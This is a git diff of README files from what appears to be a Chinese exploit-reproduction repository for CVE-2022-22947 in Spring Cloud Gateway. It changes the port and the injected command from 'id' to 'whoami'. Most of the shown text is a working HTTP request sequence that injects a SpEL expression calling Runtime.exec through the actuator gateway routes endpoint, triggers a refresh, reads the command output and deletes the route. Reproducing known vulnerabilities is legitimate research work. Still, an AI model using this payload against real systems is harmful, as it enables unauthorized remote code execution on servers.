diff --git a/00-CVE_EXP/CVE-2022-22947/README.md b/00-CVE_EXP/CVE-2022-22947/README.md
index ce6a71b..a7f4f8f 100644
--- a/00-CVE_EXP/CVE-2022-22947/README.md
+++ b/00-CVE_EXP/CVE-2022-22947/README.md
@@ -7,7 +7,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（
 
 [环境搭建过程](环境搭建)
 
-服务启动后，访问`http://your-ip:8080`即可看到演示页面，这个页面的上游就是example.com。
+服务启动后，访问`http://your-ip:9000`即可看到演示页面  
 
 ## 漏洞复现
 
@@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（
 
 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -29,7 +29,7 @@ Content-Length: 328
   "id": "hacktest",
   "filters": [{
     "name": "AddResponseHeader",
-    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
   }],
 "uri": "http://example.com",
 "order": 0
@@ -41,7 +41,7 @@ Content-Length: 328
 
 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -57,7 +57,7 @@ Content-Length: 0
 
 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -73,7 +73,7 @@ Content-Length: 0
 
 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
diff --git a/00-CVE_EXP/CVE-2022-22947/images/1.png b/00-CVE_EXP/CVE-2022-22947/images/1.png
index 4de5b54..889f96a 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/1.png and b/00-CVE_EXP/CVE-2022-22947/images/1.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/2.png b/00-CVE_EXP/CVE-2022-22947/images/2.png
index 8a65046..f691493 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/2.png and b/00-CVE_EXP/CVE-2022-22947/images/2.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/3.png b/00-CVE_EXP/CVE-2022-22947/images/3.png
index bfe7098..1283e9d 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/3.png and b/00-CVE_EXP/CVE-2022-22947/images/3.png differ
diff --git a/00-CVE_EXP/CVE-2022-22947/images/4.png b/00-CVE_EXP/CVE-2022-22947/images/4.png
index da70ad8..3c846e3 100644
Binary files a/00-CVE_EXP/CVE-2022-22947/images/4.png and b/00-CVE_EXP/CVE-2022-22947/images/4.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md
index a594bbf..a7f4f8f 100644
--- a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md	
+++ b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/README.md	
@@ -16,7 +16,7 @@ Spring Cloud Gateway是Spring中的一个API网关。其3.1.0及3.0.6版本（
 
 ```
 POST /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -29,7 +29,7 @@ Content-Length: 328
   "id": "hacktest",
   "filters": [{
     "name": "AddResponseHeader",
-    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"id\"}).getInputStream()))}"}
+    "args": {"name": "Result","value": "#{new java.lang.String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(new String[]{\"whoami\"}).getInputStream()))}"}
   }],
 "uri": "http://example.com",
 "order": 0
@@ -41,7 +41,7 @@ Content-Length: 328
 
 ```
 POST /actuator/gateway/refresh HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -57,7 +57,7 @@ Content-Length: 0
 
 ```
 GET /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
@@ -73,7 +73,7 @@ Content-Length: 0
 
 ```
 DELETE /actuator/gateway/routes/hacktest HTTP/1.1
-Host: localhost:8080
+Host: localhost:9000
 Accept-Encoding: gzip, deflate
 Accept: */*
 Accept-Language: en
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png
index 4de5b54..889f96a 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/1.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png
index 8a65046..f691493 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/2.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png
index bfe7098..1283e9d 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/3.png differ
diff --git a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png
index da70ad8..3c846e3 100644
Binary files a/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png and b/21-Spring Cloud/Spring Cloud Gateway CVE-2022-22947/images/4.png differ